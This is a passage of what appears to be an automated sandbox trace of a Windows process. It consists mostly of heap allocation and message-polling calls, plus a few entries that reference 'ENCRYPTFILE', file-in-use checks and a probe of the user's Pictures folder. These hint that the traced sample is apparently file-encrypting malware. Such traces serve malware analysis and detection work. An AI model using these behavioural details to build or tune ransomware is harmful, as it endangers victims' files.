lpMsg=0x144f534) returned 0 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0087.460] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8778 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0087.461] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.461] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.461] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0087.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8190 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0087.462] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.462] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.463] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac540 [0087.463] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.463] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0087.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0087.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0087.464] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.464] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0087.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0087.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0087.466] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0087.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0087.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.470] HeapFree (in: 